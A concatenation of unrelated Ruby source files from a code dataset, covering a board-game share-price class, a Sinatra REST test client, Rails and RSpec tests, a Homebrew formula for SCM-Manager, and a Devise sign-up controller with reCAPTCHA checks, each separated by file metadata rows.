layout 'juntos_bootstrap'
inherit_resources
actions :index, :new, :create, :destroy, :edit, :update
defaults resource_class: HomeBanner, collection_name: 'home_banners', instance_name: 'home_banner'
def update
update! { admin_home_banners_path }
end
end
| 30 | 100 | 0.769697 |
87063f234ca03860d5e79e169e8a1fc31c207013 | 1,627 | # frozen_string_literal: true
module Engine
class SharePrice
attr_reader :coordinates, :price, :color, :corporations, :can_par
def self.from_code(code, row, column, unlimited_colors, multiple_buy_colors: [])
return nil if !code || code == ''
price = code.scan(/\d/).join('').to_i
can_par = code.include?('p')
color =
case
when can_par
:red
when code.include?('blk')
:black
when code.include?('b')
:brown
when code.include?('o')
:orange
when code.include?('y')
:yellow
end
SharePrice.new([row, column],
price: price,
can_par: can_par,
color: color,
unlimited_colors: unlimited_colors,
multiple_buy_colors: multiple_buy_colors)
end
def initialize(coordinates,
price:,
can_par: false,
color: nil,
unlimited_colors: [],
multiple_buy_colors: [])
@coordinates = coordinates
@price = price
@color = color
@can_par = can_par
@corporations = []
@unlimited_colors = unlimited_colors
@multiple_buy_colors = multiple_buy_colors
end
def id
"#{@price},#{@coordinates.join(',')}"
end
def counts_for_limit
!@unlimited_colors.include?(@color)
end
def buy_multiple?
@multiple_buy_colors.include?(@color)
end
def to_s
"#{self.class.name} - #{@price} #{@coordinates}"
end
end
end
| 24.651515 | 84 | 0.532883 |
18f021f3f8e2218d899d01ac3957263b38b6c5c8 | 3,268 | require 'pry'
require 'sinatra/base'
require 'slim'
require 'activeresource'
# Active Resource Test client
module ActiveResourceTest
# Handle JSON response
class JsonFormatter
include ActiveResource::Formats::JsonFormat
attr_reader :collection_name
def initialize(collection_name)
@collection_name = collection_name.to_s
end
def decode(json)
remove_root(ActiveSupport::JSON.decode(json))
end
private
def remove_root(data)
if data.is_a?(Hash) && data[collection_name]
data[collection_name]
else
data
end
end
end
# Base class
class Base < ActiveResource::Base
self.site = 'http://localhost:3000'
self.include_root_in_json = true
self.format = JsonFormatter.new( :collection_name )
end
# Author class
class Writer < Base
# self.element_name = 'writer'
end
# Book class
class Book < Base; end
# Category class
class Category < Base; end
# Chapter class
class Chapter < Base; end
# Tag class
class Tag < Base; end
# Main class
class App < Sinatra::Application
configure do
set :port, 4000
set :views, settings.root
end
before do
@models ||= { writers: Writer, books: Book, categories: Category, chapters: Chapter, tags: Tag }
@links ||= [
[ '/', 'Main' ],
[ '/writers', 'Authors' ],
[ '/books', 'Books' ],
[ '/categories', 'Categories' ],
[ '/chapters', 'Chapters' ],
[ '/tags', 'Tags' ]
]
end
get '/' do
@details = OpenStruct.new( attributes: {} )
slim 'h2 Main', layout: :layout
end
# List
get '/:model' do
mod = @models[params[:model].to_sym]
@model = mod.to_s.split( '::' ).last.gsub( /([A-Z]+)([A-Z][a-z])/, '\1_\2' ).gsub( /([a-z\d])([A-Z])/, '\1_\2' ).tr( '-', '_' ).downcase
@list = mod.all
slim "h2 #{params[:model]}", layout: :layout
end
# Create
post '/:model' do
mod = @models[params[:model].to_sym]
@model = mod.to_s.split( '::' ).last.gsub( /([A-Z]+)([A-Z][a-z])/, '\1_\2' ).gsub( /([a-z\d])([A-Z])/, '\1_\2' ).tr( '-', '_' ).downcase
mod.new( @model => params[@model] ).save
redirect to "/#{params[:model]}"
end
# Read
get '/:model/:id' do
mod = @models[params[:model].to_sym]
@details = mod.find( params[:id] )
@model = mod.to_s.split( '::' ).last.gsub( /([A-Z]+)([A-Z][a-z])/, '\1_\2' ).gsub( /([a-z\d])([A-Z])/, '\1_\2' ).tr( '-', '_' ).downcase
slim "h2 #{params[:model]}", layout: :layout
end
# Update
post '/:model/:id' do
mod = @models[params[:model].to_sym]
@details = mod.find( params[:id] )
@model = mod.to_s.split( '::' ).last.gsub( /([A-Z]+)([A-Z][a-z])/, '\1_\2' ).gsub( /([a-z\d])([A-Z])/, '\1_\2' ).tr( '-', '_' ).downcase
params[@model].each { |k, v| @details.send( "#{k}=", v ) }
@details.save
redirect to "/#{params[:model]}"
end
# Delete
get '/:model/:id/delete' do
@item = @models[params[:model].to_sym].find( params[:id] )
@item.destroy
redirect to "/#{params[:model]}"
end
run! if app_file == $PROGRAM_NAME # = $0 ## starts the server if executed directly by ruby
end
end
| 25.936508 | 142 | 0.554774 |
5d25afaa69121f645043a7d2712b3501f7bfec1b | 970 | require 'test_helper'
class UsersSignupTest < ActionDispatch::IntegrationTest
test "invalid signup information" do
get signup_path
assert_no_difference 'User.count' do
post users_path, params: { user: { name: "",
email: "user@invalid",
password: "foo",
password_confirmation: "bar" } }
end
assert_template 'users/new'
end
test "valid signup information" do
get signup_path
assert_difference 'User.count', 1 do
post users_path, params: { user: { name: "Example User",
email: "[email protected]",
password: "password",
password_confirmation: "password" } }
end
follow_redirect!
assert_template 'users/show'
assert is_logged_in?
end
end
| 33.448276 | 78 | 0.505155 |
3350563aca17e5aad09c115abd4bcdf1c3bf720d | 128 | class Line < ActiveRecord::Base
belongs_to :script
belongs_to :actor
has_many :translations
attr_accessible :index
end
| 16 | 31 | 0.773438 |
bf7e61c7576e63676aab30caa905bc26fabf1438 | 2,278 | class ScmManager < Formula
desc "Manage Git, Mercurial, and Subversion repos over HTTP"
homepage "https://www.scm-manager.org"
url "https://maven.scm-manager.org/nexus/content/repositories/releases/sonia/scm/scm-server/1.47/scm-server-1.47-app.tar.gz"
version "1.47"
sha256 "58e86e0cd3465733a14db09d95a0ef72906b69df1341140ee7d0329a5bbe47a3"
bottle do
cellar :any_skip_relocation
sha256 "d16a74d953954dfbc1d788ae62fe0a279248570d5a5d173949f997020b326962" => :el_capitan
sha256 "d37319696b700361b7a9e2c0daf3e5f2de6b21bcb69d04bb963c775d73337f65" => :yosemite
sha256 "10f94fa5dafdb40dbcf6a7744a98b2433e294af16e7712a572de49daaed031e0" => :mavericks
end
depends_on :java => "1.6+"
resource "client" do
url "https://maven.scm-manager.org/nexus/content/repositories/releases/sonia/scm/clients/scm-cli-client/1.47/scm-cli-client-1.47-jar-with-dependencies.jar"
version "1.47"
sha256 "d4424b9d5104a1668f90278134cbe86a52d8bceba7bc85c4c9f5991debc54739"
end
def install
rm_rf Dir["bin/*.bat"]
libexec.install Dir["*"]
(bin/"scm-server").write <<-EOS.undent
#!/bin/bash
BASEDIR="#{libexec}"
REPO="#{libexec}/lib"
export JAVA_HOME=$(/usr/libexec/java_home -v 1.6)
"#{libexec}/bin/scm-server" "$@"
EOS
chmod 0755, bin/"scm-server"
tools = libexec/"tools"
tools.install resource("client")
scm_cli_client = bin/"scm-cli-client"
scm_cli_client.write <<-EOS.undent
#!/bin/bash
java -jar "#{tools}/scm-cli-client-#{version}-jar-with-dependencies.jar" "$@"
EOS
chmod 0755, scm_cli_client
end
plist_options :manual => "scm-server start"
def plist; <<-EOS.undent
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>#{plist_name}</string>
<key>ProgramArguments</key>
<array>
<string>#{opt_bin}/scm-server</string>
<string>start</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
EOS
end
test do
assert_match version.to_s, shell_output("#{bin}/scm-cli-client version")
end
end
| 31.205479 | 159 | 0.674715 |
284dd0d84dbfa48a9fd201c9b4ab8481025d63dd | 3,313 | class Users::RegistrationsController < Devise::RegistrationsController
layout "registrations"
before_filter :load_registration_form_data, only: [:new, :create]
def permit_params
if params[:user]
params.require(:user).permit(
:birthday,
:description,
:email,
:icon,
:icon_url,
:locale,
:login,
:name,
:password,
:password_confirmation,
:pi_consent,
:place_id,
:preferred_observation_fields_by,
:preferred_observation_license,
:preferred_photo_license,
:preferred_sound_license,
:prefers_community_taxa,
:time_zone
)
end
end
def create
build_resource(permit_params)
resource.site = @site
requestor_ip = Logstasher.ip_from_request_env(request.env)
resource.last_ip = requestor_ip
if @site.using_recaptcha? && !is_mobile_app? && !request.format.json?
if !GoogleRecaptcha.verify_recaptcha( response: params["g-recaptcha-response"],
remoteip: requestor_ip,
secret: @site.google_recaptcha_secret )
errors = [ I18n.t( :recaptcha_verification_failed ) ]
resource.errors.add(:recaptcha, I18n.t( :recaptcha_verification_failed ) )
end
end
if User.ip_address_is_often_suspended( requestor_ip )
errors ||= []
errors << I18n.t( :there_was_a_problem_creating_this_account )
resource.errors.add( :recaptcha, I18n.t( :there_was_a_problem_creating_this_account ) )
Logstasher.write_custom_log(
"User create failed: #{requestor_ip}", request: request, session: session, user: resource )
end
# If for some reason a user is already signed in, don't allow them to make
# another user
if current_user && current_user.id != Devise::Strategies::ApplicationJsonWebToken::ANONYMOUS_USER_ID
errors ||= []
errors << I18n.t( :user_already_authenticated )
end
unless errors
resource.wait_for_index_refresh = true
if resource.save
if resource.active_for_authentication?
set_flash_message :notice, :signed_up if is_navigational_format?
sign_in(resource_name, resource)
respond_with(resource) do |format|
format.html do
if session[:return_to_for_new_user]
redirect_to session[:return_to_for_new_user]
elsif session[:return_to]
redirect_to session[:return_to]
else
redirect_to home_path( new_user: true )
end
end
format.json do
render :json => resource.as_json(User.default_json_options)
end
end
return
else
set_flash_message :notice, :"signed_up_but_#{resource.inactive_message}" if is_navigational_format?
expire_session_data_after_sign_in!
redirect_to root_url
return
end
else
errors = resource.errors.full_messages
end
end
clean_up_passwords resource
respond_with(resource) do |format|
format.html { render :new }
format.json { render json: { errors: errors }, status: :unprocessable_entity }
end
end
end
| 32.165049 | 109 | 0.630244 |
bfa68015049124ec179d5f0f9d3c2a1ab1e398a9 | 922 | RSpec.describe RubyCiruits do
it "has a version number" do
expect(RubyCiruits::VERSION).not_to be nil
end
context "when creating a logic AND gate" do
AND1 = LogicGates::AND.new(0, 0)
AND2 = LogicGates::AND.new(1, 0)
AND3 = LogicGates::AND.new(1, 1)
it "with 2 inputs (0, 0)" do
expect(AND1.output).to eq(0)
end
it "with 2 inputs (1, 0)" do
expect(AND2.output).to eq(0)
end
it "with 2 inputs (1, 1)" do
expect(AND3.output).to eq(1)
end
end
context "when creating a logic OR gate" do
OR1 = LogicGates::OR.new(0, 0)
OR2 = LogicGates::OR.new(1, 0)
OR3 = LogicGates::OR.new(1, 1)
it "with 2 inputs (0, 0)" do
expect(OR1.output).to eq(0)
end
it "with 2 inputs (1, 0)" do
expect(OR2.output).to eq(1)
end
it "with 2 inputs (1, 1)" do
expect(OR3.output).to eq(1)
end
end
end
| 20.488889 | 47 | 0.574837 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.